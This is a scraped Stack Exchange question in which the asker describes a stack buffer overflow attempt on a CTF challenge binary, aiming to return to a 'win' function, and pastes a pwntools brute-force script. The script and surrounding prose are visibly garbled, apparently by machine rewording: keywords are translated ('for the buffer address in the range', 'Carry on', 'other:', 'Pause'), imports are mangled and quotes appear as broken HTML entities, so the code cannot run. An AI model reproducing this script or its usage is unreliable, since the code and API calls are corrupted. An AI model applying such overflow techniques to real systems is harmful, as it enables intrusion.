exploit – Binary operation – Information Security Stack Exchange


I'm trying to meet the challenge of an FCE with which I played, but I just can not succeed. I think you must succeed in using the buffer overflow, but I do not see what I'm doing wrong since it works in gdb. I think that's because ASLR is enabled for the binary. I'll leave a link here with the binary so you can search for yourself here

I will try to explain my observations and what I have tried:

We can see that the program takes 2 inputs, performs calculations and generates a number for you. But we can also see that the second entry can be overwhelmed since the first entry is introduced in the strtoul a function. Well then let's do it! However, this being a 64-bit executable, we need to put the address on the stack and after the let instruction we must have our address on the top of the stack so the ret the instruction will use it.
I found an address that worked in gdb and I called the so-called to win function, you can see in the symbols of the binary. But this only Work in gdb. So, there must be another address for the start of the buffer, so I tried to force it hard. And I did this script in python using pwntools:

#! / usr / bin / python

pwn import *
import structure

exec_path = & # 39; ./ run.sh & # 39;

offset = 136

addr_win = 0x400687


addr_on_stack = 0x7fffffffeae8

for the buffer address in the range (addr_on_stack - 1024, addr_on_stack + 1024, 8):
io = process (exec_path)
payload = struct.pack ("Q", addr_win) + & # 39; A & # 39; * 120 + struct.pack ("Q", buffer_address)
log.info ("Test address 0x {: 0x} as a buffer address" .format (buffer_address))

log.info ("format of the load is {}". format ("". join ((\ x {: 02x} ". format (ord (b)) for b in the load)))
io.sendline ('1')
io.sendline (payload)
io.recvuntil ("Now, give me the first guideline:")
with open ("pay", "wb") as f:
f.write (payload)

msg = io.recvall (wait time = 3)
print msg
if "your answer is" in msg or "Segmentation error" in msg or "relocation error" in msg or "Inconsistency detected" in msg:
io.wait ()
io.close ()
io.kill ()
Carry on
other:
Pause
io.interactive ()

However, after running this, I still can not call it the function I want. I've also tried changing the last byte of the buffer's start address, but I can only overwrite it with x00 because regardless of the size of the input, fgets will always set the NULL byte at the end of the reading string. Any ideas on how should I really tackle it?

I'm not sure if this is the right site to publish this, but I do not see anything about stackexchange where I should ask questions like this and I really miss ideas and want to know more!